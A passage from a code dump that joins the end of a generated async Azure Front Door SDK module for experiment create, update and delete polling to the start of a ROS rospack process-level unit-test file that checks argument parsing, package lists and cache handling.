    :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
     this operation to not poll, or pass in your own initialized polling object for a personal
     polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either Experiment or the result of
     cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    # Per-call header/query overrides; HTTP header names are case-insensitive.
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
    content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
    cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
    polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token: Optional[str] = kwargs.pop("continuation_token", None)
    if cont_token is None:
        # No saved poller state: issue the initial PUT. cls is overridden so
        # the raw pipeline response is handed to the poller for inspection.
        raw_result = await self._create_or_update_initial(
            resource_group_name=resource_group_name,
            profile_name=profile_name,
            experiment_name=experiment_name,
            parameters=parameters,
            api_version=api_version,
            content_type=content_type,
            cls=lambda x, y, z: x,
            headers=_headers,
            params=_params,
            **kwargs
        )
    kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialize the terminal LRO response into an Experiment model.
        deserialized = self._deserialize("Experiment", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    # Select the polling strategy: default ARM polling, no polling, or a
    # caller-supplied polling method.
    if polling is True:
        polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
    elif polling is False:
        polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
    else:
        polling_method = polling
    if cont_token:
        # Rehydrate a poller from a previously saved continuation token.
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

begin_create_or_update.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
async def _update_initial(
    self,
    resource_group_name: str,
    profile_name: str,
    experiment_name: str,
    parameters: Union[_models.ExperimentUpdateModel, IO],
    **kwargs: Any
) -> _models.Experiment:
    # Internal helper: issues the initial PATCH of the update LRO and returns
    # the response deserialized as an Experiment. Used by begin_update.
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        304: ResourceNotModifiedError,
    }
    error_map.update(kwargs.pop("error_map", {}) or {})

    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
    content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
    cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)

    content_type = content_type or "application/json"
    _json = None
    _content = None
    # Stream/bytes bodies are forwarded untouched; model bodies are serialized.
    if isinstance(parameters, (IO, bytes)):
        _content = parameters
    else:
        _json = self._serialize.body(parameters, "ExperimentUpdateModel")

    request = build_update_request(
        resource_group_name=resource_group_name,
        profile_name=profile_name,
        experiment_name=experiment_name,
        subscription_id=self._config.subscription_id,
        api_version=api_version,
        content_type=content_type,
        json=_json,
        content=_content,
        template_url=self._update_initial.metadata["url"],
        headers=_headers,
        params=_params,
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
        request, stream=False, **kwargs
    )

    response = pipeline_response.http_response

    # 200 = update applied, 202 = update accepted (async); anything else is an
    # error surfaced as HttpResponseError with the ARM error payload attached.
    if response.status_code not in [200, 202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if response.status_code == 200:
        deserialized = self._deserialize("Experiment", pipeline_response)

    if response.status_code == 202:
        deserialized = self._deserialize("Experiment", pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})  # type: ignore

    return deserialized  # type: ignore

_update_initial.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
# Typing-only overload: request body supplied as an ExperimentUpdateModel.
# The runtime implementation is the @distributed_trace_async method below.
@overload
async def begin_update(
    self,
    resource_group_name: str,
    profile_name: str,
    experiment_name: str,
    parameters: _models.ExperimentUpdateModel,
    *,
    content_type: str = "application/json",
    **kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
    """Updates an Experiment by Experiment id.

    Updates an Experiment.

    :param resource_group_name: Name of the Resource group within the Azure subscription. Required.
    :type resource_group_name: str
    :param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
    :type profile_name: str
    :param experiment_name: The Experiment identifier associated with the Experiment. Required.
    :type experiment_name: str
    :param parameters: The Experiment Update Model. Required.
    :type parameters: ~azure.mgmt.frontdoor.models.ExperimentUpdateModel
    :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
     Default value is "application/json".
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
     this operation to not poll, or pass in your own initialized polling object for a personal
     polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either Experiment or the result of
     cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
# Typing-only overload: request body supplied as a binary stream (IO).
# The runtime implementation is the @distributed_trace_async method below.
@overload
async def begin_update(
    self,
    resource_group_name: str,
    profile_name: str,
    experiment_name: str,
    parameters: IO,
    *,
    content_type: str = "application/json",
    **kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
    """Updates an Experiment by Experiment id.

    Updates an Experiment.

    :param resource_group_name: Name of the Resource group within the Azure subscription. Required.
    :type resource_group_name: str
    :param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
    :type profile_name: str
    :param experiment_name: The Experiment identifier associated with the Experiment. Required.
    :type experiment_name: str
    :param parameters: The Experiment Update Model. Required.
    :type parameters: IO
    :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
     Default value is "application/json".
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
     this operation to not poll, or pass in your own initialized polling object for a personal
     polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either Experiment or the result of
     cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
@distributed_trace_async
async def begin_update(
    self,
    resource_group_name: str,
    profile_name: str,
    experiment_name: str,
    parameters: Union[_models.ExperimentUpdateModel, IO],
    **kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
    """Updates an Experiment by Experiment id.

    Updates an Experiment.

    :param resource_group_name: Name of the Resource group within the Azure subscription. Required.
    :type resource_group_name: str
    :param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
    :type profile_name: str
    :param experiment_name: The Experiment identifier associated with the Experiment. Required.
    :type experiment_name: str
    :param parameters: The Experiment Update Model. Is either a model type or a IO type. Required.
    :type parameters: ~azure.mgmt.frontdoor.models.ExperimentUpdateModel or IO
    :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
     Default value is None.
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
     this operation to not poll, or pass in your own initialized polling object for a personal
     polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either Experiment or the result of
     cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    # Per-call header/query overrides; HTTP header names are case-insensitive.
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
    content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
    cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
    polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token: Optional[str] = kwargs.pop("continuation_token", None)
    if cont_token is None:
        # No saved poller state: issue the initial PATCH. cls is overridden so
        # the raw pipeline response is handed to the poller for inspection.
        raw_result = await self._update_initial(
            resource_group_name=resource_group_name,
            profile_name=profile_name,
            experiment_name=experiment_name,
            parameters=parameters,
            api_version=api_version,
            content_type=content_type,
            cls=lambda x, y, z: x,
            headers=_headers,
            params=_params,
            **kwargs
        )
    kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialize the terminal LRO response into an Experiment model.
        deserialized = self._deserialize("Experiment", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    # Select the polling strategy: default ARM polling, no polling, or a
    # caller-supplied polling method.
    if polling is True:
        polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
    elif polling is False:
        polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
    else:
        polling_method = polling
    if cont_token:
        # Rehydrate a poller from a previously saved continuation token.
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

begin_update.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
async def _delete_initial(  # pylint: disable=inconsistent-return-statements
    self, resource_group_name: str, profile_name: str, experiment_name: str, **kwargs: Any
) -> None:
    # Internal helper: issues the initial DELETE of the delete LRO.
    # Returns None (or cls(...) if a custom response callback was supplied).
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        304: ResourceNotModifiedError,
    }
    error_map.update(kwargs.pop("error_map", {}) or {})

    _headers = kwargs.pop("headers", {}) or {}
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
    cls: ClsType[None] = kwargs.pop("cls", None)

    request = build_delete_request(
        resource_group_name=resource_group_name,
        profile_name=profile_name,
        experiment_name=experiment_name,
        subscription_id=self._config.subscription_id,
        api_version=api_version,
        template_url=self._delete_initial.metadata["url"],
        headers=_headers,
        params=_params,
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
        request, stream=False, **kwargs
    )

    response = pipeline_response.http_response

    # 200/202/204 are all acceptable for DELETE; anything else is raised as an
    # HttpResponseError carrying the deserialized ARM error payload.
    if response.status_code not in [200, 202, 204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})

_delete_initial.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
@distributed_trace_async
async def begin_delete(
    self, resource_group_name: str, profile_name: str, experiment_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
    """Deletes an Experiment.

    Deletes an Experiment.

    :param resource_group_name: Name of the Resource group within the Azure subscription. Required.
    :type resource_group_name: str
    :param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
    :type profile_name: str
    :param experiment_name: The Experiment identifier associated with the Experiment. Required.
    :type experiment_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
     this operation to not poll, or pass in your own initialized polling object for a personal
     polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[None]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    _headers = kwargs.pop("headers", {}) or {}
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
    cls: ClsType[None] = kwargs.pop("cls", None)
    polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token: Optional[str] = kwargs.pop("continuation_token", None)
    if cont_token is None:
        # No saved poller state: issue the initial DELETE. cls is overridden so
        # the raw pipeline response is handed to the poller for inspection.
        raw_result = await self._delete_initial(  # type: ignore
            resource_group_name=resource_group_name,
            profile_name=profile_name,
            experiment_name=experiment_name,
            api_version=api_version,
            cls=lambda x, y, z: x,
            headers=_headers,
            params=_params,
            **kwargs
        )
    kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # DELETE produces no body; only invoke the optional response callback.
        if cls:
            return cls(pipeline_response, None, {})

    # Select the polling strategy: default ARM polling, no polling, or a
    # caller-supplied polling method.
    if polling is True:
        polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
    elif polling is False:
        polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
    else:
        polling_method = polling
    if cont_token:
        # Rehydrate a poller from a previously saved continuation token.
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

begin_delete.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
| [
"[email protected]"
] | |
f085ce927f914d7feac5640390c519859f1df241 | 53e3e676b66e4ed6bbf7941c7e78c2820fcbed59 | /build_isolated/rospack/test/test/utest.py | c5cf969afefe057c5a2c2fca0f9db7480002ba66 | [] | no_license | daichi08/catkin_ws_atPi | 0bdc3e5f2c7073d888a2f6109c0842521c99104e | 9690697e1d432f06c5ee4570a0e7d1a2cc7c44ed | refs/heads/master | 2020-03-22T21:09:04.291933 | 2018-08-02T06:10:41 | 2018-08-02T06:10:41 | 140,661,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,742 | py | # Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Brian Gerkey/Ken Conley
import os
import unittest
import tempfile
import shutil
import sys
import platform
from subprocess import Popen, PIPE
# Names of the environment variables rospack consumes.
ROS_PACKAGE_PATH = 'ROS_PACKAGE_PATH'
ROS_LANG_DISABLE = 'ROS_LANG_DISABLE'

# Absolute path of the rospack executable under test (baked in at build time).
ROSPACK_PATH = "/home/pi/catkin_ws/devel_isolated/rospack/bin/rospack"

# Set the initial CWD, so that we can set it back later.
# Go up one directory. Have to do this because nosetests doesn't seem to
# run properly from the parent directory, even with --where= passed in.
initial_cwd = os.path.dirname(os.path.dirname(__file__))
os.chdir(initial_cwd)

_structure_test_p = os.path.abspath('structure_test')

# expected layout of the structure_test directory, used for rospack find and list tests
structure_test = {
    'package1': 'package1',
    'package2': 'package2',
    'package3': 'subdir1/package3',
    'package4': 'subdir1/subdir1_1/package4',
    'package5': 'subdir1/subdir1_1/package5',
    'package6': 'subdir3/package6',
    'package7': 'subdir3/package7',
}
# canonicalize: turn the relative layout paths into absolute paths so they can
# be compared directly against rospack output.
for k in structure_test.keys():
    structure_test[k] = os.path.abspath(os.path.join(_structure_test_p, structure_test[k]))

# Command aliases: each alias is expected to behave identically to its
# canonical command; _run_rospack re-runs every aliased command to verify.
aliases = {
    'deps': 'depends',
    'deps1': 'depends1',
    'deps-manifests': 'depends-manifests',
    'deps-indent': 'depends-indent',
    'rosdep': 'rosdeps',
    'rosdep0': 'rosdeps0'
}
## Process-level tests of rospack executable
class RospackTestCase(unittest.TestCase):
def setUp(self):
    """Restore the working directory before each test (some tests chdir)."""
    # Some tests change CWD
    os.chdir(initial_cwd)
## runs rospack with the given ROS_PACKAGE_PATH (None removes the variable)
## @return int, str, str: return code, stdout, stderr
def _run_rospack(self, ros_package_path, pkgname, command):
    """Run the rospack binary once and return (returncode, stdout, stderr).

    If the command has a known alias, the aliased form is also run and must
    produce the same return code and stdout. A negative return code
    (process killed by a signal, i.e. a crash) fails the test immediately.
    """
    env = os.environ.copy()
    if ros_package_path is not None:
        env[ROS_PACKAGE_PATH] = ros_package_path
    elif ROS_PACKAGE_PATH in env:
        del env[ROS_PACKAGE_PATH]
    # Must split up the command string into its whitespace separated
    # components; otherwise you get multiple words as one element of
    # argv.
    args = [ROSPACK_PATH]
    if command:
        for s in command.split():
            args.append(s)
    if pkgname is not None:
        args.append(pkgname)
    p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
    stdout, stderr = p.communicate()
    # Also test command aliases, verifying that they give the same
    # return code and console output
    if command:
        cmd = command.split()[-1]
        if cmd in aliases:
            args[-2] = aliases[cmd]
            alias_p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
            alias_stdout, alias_stderr = alias_p.communicate()
            self.assertEquals(p.returncode, alias_p.returncode)
            self.assertEquals(stdout, alias_stdout)
            #self.assertEquals(stderr, alias_stderr)
    # rospack should only yield non-negative return codes. A negative
    # return code indicates a crash (e.g., SIGSEGV, SIGABORT), which is
    # never ok.
    if p.returncode < 0:
        # Fixed message: the check is for a *negative* code (signal death),
        # not merely non-zero.
        self.fail('rospack returned negative exit code (%d), indicating a crash'%(p.returncode))
    return p.returncode, stdout.strip().decode('ascii'), stderr.decode('ascii')
################################################################################
# HELPER ROUTINES
# NOTE: helpers with the 'e' prefix take in environment parameters
## @return str: stdout
def run_rospack(self, pkgname, command):
    """Run rospack with ROS_PACKAGE_PATH pointed at ./test; return stdout."""
    return self._run_rospack(os.path.abspath('test'), pkgname, command)[1]
## @return str: stdout
def erun_rospack(self, ros_package_path, pkgname, command):
    """Run rospack with an explicit ROS_PACKAGE_PATH; return stdout only."""
    _code, out, _err = self._run_rospack(ros_package_path, pkgname, command)
    return out
## runs rospack with ROS_PACKAGE_PATH set to ./test
## @return int: status code
def run_rospack_status(self, pkgname, command):
    """Run rospack against ./test and return only the process status code."""
    return self._run_rospack(os.path.abspath('test'), pkgname, command)[0]
## @return int: status code
def erun_rospack_status(self, ros_package_path, pkgname, command):
    """Run rospack with an explicit ROS_PACKAGE_PATH; return the status code."""
    code, _out, _err = self._run_rospack(ros_package_path, pkgname, command)
    return code
## assert that rospack fails on the specified args
def rospack_fail(self, package, command):
    """Assert that `rospack <command> <package>` (RPP=./test) exits non-zero."""
    result = self._run_rospack(os.path.abspath('test'), package, command)
    code, stdout, stderr = result
    self.assertNotEquals(0, code, "rospack [%s %s] should have failed. \n\nstdout[%s] \n\nstderr[%s]"%(command, package, stdout, stderr))
## assert that rospack fails on the specified args. includes ROS_PACKAGE_PATH
def erospack_fail(self, ros_package_path, package, command):
    """Assert that rospack exits non-zero under the given ROS_PACKAGE_PATH."""
    code, stdout, stderr = self._run_rospack(ros_package_path, package, command)
    failed = (code != 0)
    self.assertNotEquals(0, code, "rospack [%s %s] should have failed instead of returning status code 0. \n\nstdout[%s] \n\nstderr[%s]"%(command, package, stdout, stderr))
## assert that rospack succeeds on the specified args
def rospack_succeed(self, package, command):
    """Assert that `rospack <command> <package>` (RPP=./test) exits zero."""
    status_code, stdout, stderr = self._run_rospack(os.path.abspath('test'), package, command)
    self.assertEquals(0, status_code, '"rospack %s %s" failed with status code [%s] instead of succeeding with [0]. \n\nstdout[%s] \n\nstderr[%s]'%(command, package, status_code, stdout, stderr))
## assert that rospack succeeds on the specified args
def erospack_succeed(self, ros_package_path, package, command):
    """Assert that rospack exits zero under the given ROS_PACKAGE_PATH."""
    outcome = self._run_rospack(ros_package_path, package, command)
    status_code, stdout, stderr = outcome
    self.assertEquals(0, status_code, "rospack [%s %s, env ROS_PACKAGE_PATH=%s] failed with status code [%s] instead of succeeding with [0]. \n\nstdout[%s] \n\nstderr[%s]"%(command, package, ros_package_path, status_code, stdout, stderr))
# helper routine that does return value validation where the return value from
# rospack is an ordered, line-separated list
def check_ordered_list(self, command, tests):
    """For each (expected_lines, package) pair, run `rospack <command>` and
    assert the output matches both in content and in order."""
    for retlist, package in tests:
        self.rospack_succeed(package, command)
        retval = self.strip_opt_ros(self.run_rospack(package, command))
        retactual = [v for v in retval.split('\n') if v]
        # Set symmetric difference gives a readable content-mismatch message;
        # the join comparison afterwards additionally enforces ordering.
        self.failIf(set(retlist) ^ set(retactual), "rospack %s %s failed: [%s] vs [%s]"%(command, package, retlist, retactual))
        self.assertEquals('\n'.join(retlist), '\n'.join(retactual))
# variant of check_ordered_list that allows specifying ros_package_path.
# helper routine that does return value validation where the return value from
# rospack is a line-separated list
def echeck_ordered_list(self, command, tests):
    """For each (expected_lines, ros_package_path, package) triple, run
    rospack under that ROS_PACKAGE_PATH and assert the output content matches.

    NOTE(review): despite the name, only set equality is checked here (no
    ordering assert, unlike check_ordered_list) -- confirm that is intended.
    """
    for retlist, ros_package_path, package in tests:
        self.erospack_succeed(ros_package_path, package, command)
        retval = self.erun_rospack(ros_package_path, package, command)
        retactual = [v for v in retval.split('\n') if v]
        self.failIf(set(retlist) ^ set(retactual), "[env %s] rospack %s %s failed: [%s] vs [%s]"%(ros_package_path, command, package, retlist, retactual))
# variant that does not require ordering among the return values
def check_unordered_list(self, command, tests):
    """For each (expected_lines, package) pair, run `rospack <command>` and
    assert the output lines match as a set (order is ignored)."""
    for retlist, package in tests:
        self.rospack_succeed(package, command)
        retval = self.run_rospack(package, command)
        retactual = [v for v in retval.split('\n') if v]
        self.failIf(set(retlist) ^ set(retactual), "rospack %s %s failed: [%s] vs [%s]"%(command, package, retlist, retactual))
# variant that does not require ordering among the return values
def echeck_unordered_list(self, command, tests):
    """For each (expected_lines, ros_package_path, package) triple, run
    rospack under that ROS_PACKAGE_PATH and assert the output lines match
    as a set (order is ignored)."""
    for retlist, ros_package_path, package in tests:
        self.erospack_succeed(ros_package_path, package, command)
        retval = self.erun_rospack(ros_package_path, package, command)
        retactual = [v for v in retval.split('\n') if v]
        self.failIf(set(retlist) ^ set(retactual), "rospack %s %s failed: [%s] vs [%s]"%(command, package, retlist, retactual))
################################################################################
## ARG PARSING
def test_no_option(self):
    """rospack invoked with no command and no package should still succeed."""
    self.rospack_succeed(None, None)
def test_fake_option(self):
    """An unrecognized option must make rospack exit with an error."""
    self.rospack_fail("deps", "--fake deps")
def test_invalid_option(self):
    """Options that are invalid for a given command must cause failure."""
    # --lang/--attrib are only meaningful for 'export'/'plugins', not 'deps'.
    self.rospack_fail("deps", "deps --lang=cpp --attrib=flags")
    self.rospack_fail("deps", "deps --lang=cpp")
    self.rospack_fail("deps", "deps --attrib=lflags")
    # Empty/invalid option values must be rejected.
    self.rospack_fail("base", "export --lang=cpp --attrib=cflags --top=")
    self.rospack_fail(None, "profile --length=")
    # Options valid only for 'profile' must fail on other commands.
    self.rospack_fail(None, "deps --length=10")
    self.rospack_fail(None, "deps --zombie-only")
    self.rospack_fail(None, "profile --deps-only")
def test_ros_cache_timeout(self):
    """'rospack profile' must succeed for zero, negative, and tiny
    ROS_CACHE_TIMEOUT values."""
    env = os.environ.copy()
    os.environ['ROS_CACHE_TIMEOUT'] = '0'
    self.rospack_succeed(None, "profile")
    os.environ['ROS_CACHE_TIMEOUT'] = '-1'
    self.rospack_succeed(None, "profile")
    import time
    # Sleep so the cache written above is older than the sub-millisecond
    # timeout used next.
    time.sleep(0.1)
    os.environ['ROS_CACHE_TIMEOUT'] = '.001'
    self.rospack_succeed(None, "profile")
    # NOTE(review): rebinding os.environ to a plain dict copy bypasses the
    # putenv-synchronized mapping -- confirm later tests don't depend on it.
    os.environ = env
def test_profile(self):
    """'rospack profile' must accept its --zombie-only and --length options."""
    # TODO: test that the output is correct
    self.rospack_succeed(None, "profile --zombie-only")
    # TODO: test that the output is correct
    self.rospack_succeed(None, "profile --length=10")
def test_ros_home(self):
    """rospack must write its cache under ROS_HOME and tolerate a missing,
    unwritable, corrupted, or non-directory ROS_HOME (see ros ticket #2812)."""
    env = os.environ.copy()
    # Make sure we write to ROS_HOME, #2812.
    d = tempfile.mkdtemp()
    self.assertEquals(0, len(os.listdir(d)))
    os.environ['ROS_HOME'] = d
    self.rospack_succeed(None, "profile")
    # Exactly one cache file should have been created in ROS_HOME.
    self.assertEquals(1, len(os.listdir(d)))
    cache_path = os.path.join(d, os.listdir(d)[0])
    self.assertEquals(True, os.path.exists(cache_path))
    # Make sure we auto-create ROS_HOME
    shutil.rmtree(d)
    self.rospack_succeed(None, "profile")
    self.assertEquals(True, os.path.exists(cache_path))
    # Test with a corrupted cache
    f = open(cache_path, 'w')
    f.write('#SOMETHING\n')
    f.close()
    self.rospack_succeed(None, "list")
    # Make sure we proceed when we can't write to ROS_HOME
    os.chmod(d, 0000)
    self.rospack_succeed(None, "profile")
    # Delete the .ros directory, just in case this test is being run as
    # root, in which case the above call will cause .ros to be created,
    # despite the restrictive permissions that were set.
    if os.path.exists(d):
        os.chmod(d, 0o700)
        shutil.rmtree(d)
    # Make sure we proceed when we HOME/.ros isn't a directory
    f = open(d, 'w')
    f.close()
    os.chmod(d, 0o700)
    self.rospack_succeed(None, "profile")
    # Make sure we proceed when neither HOME nor ROS_HOME is set
    del os.environ['ROS_HOME']
    del os.environ['HOME']
    self.rospack_succeed(None, "profile")
    # Clean up
    os.unlink(d)
    os.environ = env
def test_no_package_allowed(self):
    """Commands that take no package argument must succeed without one."""
    self.rospack_succeed(None, "help")
    self.rospack_succeed(None, "profile")
    self.rospack_succeed(None, "list")
    self.rospack_succeed(None, "list-names")
    self.rospack_succeed(None, "list-duplicates")
    self.rospack_succeed(None, "langs")
def test_no_package_allowed_bad(self):
    """Commands that take no package argument must fail when given one."""
    self.rospack_fail("deps", "profile")
    self.rospack_fail("deps", "list")
    self.rospack_fail("deps", "list-names")
    self.rospack_fail("deps", "list-duplicates")
    self.rospack_fail("deps", "langs")
def test_export_bad(self):
    """'export' must reject missing, empty, duplicated, or misplaced
    --lang/--attrib/--top options."""
    self.rospack_fail("base", "export --lang= --attrib=lflags")
